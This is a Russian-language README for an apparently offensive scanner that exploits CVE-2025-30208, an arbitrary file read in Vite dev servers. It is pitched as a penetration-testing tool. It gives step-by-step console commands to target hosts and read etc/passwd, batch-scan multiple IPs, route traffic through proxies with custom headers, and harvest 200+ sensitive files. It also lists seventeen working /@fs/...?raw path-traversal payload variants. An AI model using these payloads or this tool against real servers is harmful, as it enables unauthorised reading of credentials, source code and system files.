
CVE‑2025‑30208 — это уязвимость средней степени тяжести, допускающая произвольное чтение файлов на сервере разработки Vite (популярный инструмент сборки фронтенда).
Продвинутый сканер уязвимости CVE-2025-30208 с функциями корпоративного уровня
Профессиональный инструмент тестирования на проникновение для обнаружения уязвимости произвольного чтения файлов в Vite
🚀 Быстрый старт • 📋 Возможности • 🔧 Использование • 📊 Примеры • 🛡️ Безопасность
Это комплексный сканер уязвимостей, предназначенный для обнаружения и эксплуатации уязвимости CVE-2025-30208 в серверах разработки Vite. Уязвимость позволяет осуществлять произвольное чтение файлов через конечные точки файловой системы Vite, что потенциально открывает доступ к конфиденциальным файлам конфигурации, исходному коду и системной информации.
Теперь инструмент имеет модульную архитектуру для улучшения сопровождаемости и расширяемости:
CVE-2025-30208.py — основное приложение сканераpayloads.py — продвинутые эксплойт-пейлоады (60+ вариаций)sensitive_files.py — обширная база конфиденциальных файлов (200+ файлов)html_template.py — улучшенный HTML-шаблон отчётов в хакерском стилеpip3 install -r requirements.txt
python3 CVE-2025-30208.py
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd
CVE-2025-30208 > test
CVE-2025-30208 > run
# Enable verbose mode for detailed output
CVE-2025-30208 > verbose
CVE-2025-30208 > run
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch
192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Press Enter twice to finish]
CVE-2025-30208 > scan
# Configure proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
# Set custom headers
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}
# Configure rate limiting
CVE-2025-30208 > rate
Enter rate limit: 1.0
# Generate beautiful HTML report
CVE-2025-30208 > pull
# Start web server to view report
CVE-2025-30208 > web
# Start web server on specific port
CVE-2025-30208 > web 8081
# Stop web server
CVE-2025-30208 > web off
| Команда | Описание | Пример |
|---|---|---|
set <option> <value> | Установить параметры конфигурации | set RHOST 192.168.1.100 |
show options | Показать текущие настройки | show options |
edit | Интерактивный редактор параметров | edit |
run / exploit | Запустить тест на уязвимость | run |
batch | Пакетное сканирование нескольких целей | batch |
scan | Поиск конфиденциальных файлов | scan |
pull | Экспортировать результаты в HTML/JSON | pull |
web [on|off|port] | Веб-сервер для HTML-отчётов | web 8080 |
save | Сохранить конфигурацию сеанса | save |
load | Загрузить конфигурацию сеанса | load |
test | Проверить связь с целью | test |
validate | Проверить текущую конфигурацию | validate |
verbose | Переключить подробный режим | verbose |
proxy | Настроить параметры прокси | proxy |
headers | Установить пользовательские HTTP-заголовки | headers |
rate | Настроить ограничение скорости | rate |
log | Показать информацию журнала | log |
help / ? | Показать справку | help |
exit / quit | Выйти из инструмента | exit |
| Параметр | Описание | По умолчанию | Проверка |
|---|---|---|---|
RHOST | Целевой хост / IP-адрес | - | Проверка имени хоста / IP |
RPORT | Номер порта цели | - | Диапазон портов (1-65535) |
FILEPATH | Путь к файлу для проверки | etc/passwd | Проверка пути |
PROXY | URL HTTP/HTTPS-прокси | - | Проверка формата URL |
VERBOSE | Включить подробный вывод | false | Проверка логического значения |
RATE_LIMIT | Задержка между запросами (секунды) | 0.3 | Числовая проверка |
THREADS | Количество потоков для пакетного сканирования | 5 | Проверка целочисленного значения |
TIMEOUT | Тайм-аут запроса (секунды) | 5 | Проверка целочисленного значения |
CUSTOM_HEADERS | Пользовательские HTTP-заголовки (JSON) | {} | Проверка формата JSON |
Сканер теперь использует 60+ различных вариаций пейлоадов, организованных в payloads.py:
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug